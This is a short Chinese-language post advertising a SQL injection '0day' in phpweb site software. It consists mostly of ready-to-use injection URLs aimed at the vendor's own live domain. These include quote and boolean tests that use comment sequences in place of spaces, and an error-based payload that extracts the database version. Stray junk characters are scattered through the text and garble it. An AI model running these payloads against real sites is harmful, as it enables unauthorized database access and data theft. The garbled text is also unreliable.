phpweb伪静态页面注入0day

admin

phpweb所有的整站程序伪静态页面都存在sql注入
  S  b- ^, F* H/ t( D" N  L& M
主站：http://phpweb.net/
+ g' l) R# \2 c1 _) M; |7 h加’检测：
& Z5 f% ]/ _" S: J; c
http://www.phpweb.net/down/html/?772′.html

出错
存在注入。
不能用空格，只能用/*罗
9 ?  T( O6 K& L0 Q$ x  W/ o" Q5 ohttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
0 G& O' T9 L) G# g) Q- d# M9 G2 v2 k
; C$ o; w. h8 B$ @# Y: z. ahttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
. y% Y7 K( u  k% V' R1 v( J/ L" L爆数据库版本：
6 c* e2 ^6 o* {$ R5 |
3 Q9 S8 X" {% k) w* a& C?
2 g6 t/ b/ R1 u: Y* S/ ^' Q1
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
- b5 h1 ?& d3 t: X* i( X1 x+ p: a更新日期: 2013-01-03 13:39:50